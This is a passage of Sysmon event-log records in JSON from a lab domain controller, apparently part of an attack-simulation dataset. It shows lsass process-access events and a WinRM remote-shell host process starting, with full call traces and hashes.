C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.280","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4469,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.280\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.280","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4470,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.280\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.280","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4471,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4472,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4473,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4474,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.428\r\nProcessGuid: {A837DB8D-0312-5F25-0000-0010F4B40600}\r\nProcessId: 1348\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.428","ProcessGuid":"{A837DB8D-0312-5F25-0000-0010F4B40600}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4475,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-0010F4B40600}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-0010F4B40600}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
